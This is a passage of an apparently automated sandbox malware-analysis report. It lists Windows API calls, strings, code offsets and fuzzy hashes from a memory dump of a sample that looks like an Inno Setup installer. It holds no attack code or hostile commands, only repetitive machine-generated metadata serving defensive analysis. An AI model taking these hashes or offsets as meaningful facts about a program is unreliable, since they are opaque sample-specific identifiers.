                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Enum$NameOpenResourceUniversal
                                                                                            • String ID: Z
                                                                                            • API String ID: 3604996873-1505515367
                                                                                            • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                            • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                            • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                            • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                            APIs
                                                                                            • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText$EmptyRect
                                                                                            • String ID:
                                                                                            • API String ID: 182455014-2867612384
                                                                                            • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                            • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                            • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                            • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                            • String ID: ...\
                                                                                            • API String ID: 3133960002-983595016
                                                                                            • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                            • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                            • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                            • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                            • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                            • RegisterClassA.USER32(?), ref: 004164CE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$InfoRegisterUnregister
                                                                                            • String ID: @
                                                                                            • API String ID: 3749476976-2766056989
                                                                                            • Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                            • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                            • Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                            • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$Move
                                                                                            • String ID: isRS-%.3u.tmp
                                                                                            • API String ID: 3839737484-3657609586
                                                                                            • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                            • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                            • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                            • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                            • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitMessageProcess
                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                            • API String ID: 1220098344-2970929446
                                                                                            • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                            • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                            • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                            • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                            APIs
                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                            • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                                                            • API String ID: 1312246647-2435364021
                                                                                            • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                            • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                            • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                            • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                            • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                            Strings
                                                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                            • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                            • API String ID: 3850602802-3720027226
                                                                                            • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                            • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                            • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                            • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                            APIs
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • GetFocus.USER32 ref: 00478757
                                                                                            • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                            • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FocusMessageStateTextWaitWindow
                                                                                            • String ID: Wnd=$%x
                                                                                            • API String ID: 1381870634-2927251529
                                                                                            • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                            • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                            • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                            • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                            APIs
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$File$LocalSystem
                                                                                            • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                            • API String ID: 1748579591-1013271723
                                                                                            • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                            • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                            • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                            • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesDeleteErrorLastMove
                                                                                            • String ID: DeleteFile$MoveFile
                                                                                            • API String ID: 3024442154-139070271
                                                                                            • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                            • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                            • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                            • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                            • API String ID: 47109696-2631785700
                                                                                            • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                            • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                            • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                            • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                            • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                            Strings
                                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                            • CSDVersion, xrefs: 00483BFC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                            • API String ID: 3677997916-1910633163
                                                                                            • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                            • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                            • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                            • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                            • API String ID: 1646373207-4063490227
                                                                                            • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                            • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                            • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                            • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                            • API String ID: 1646373207-260599015
                                                                                            • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                            • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                            • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                            • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: NotifyWinEvent$user32.dll
                                                                                            • API String ID: 1646373207-597752486
                                                                                            • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                            • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                            • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
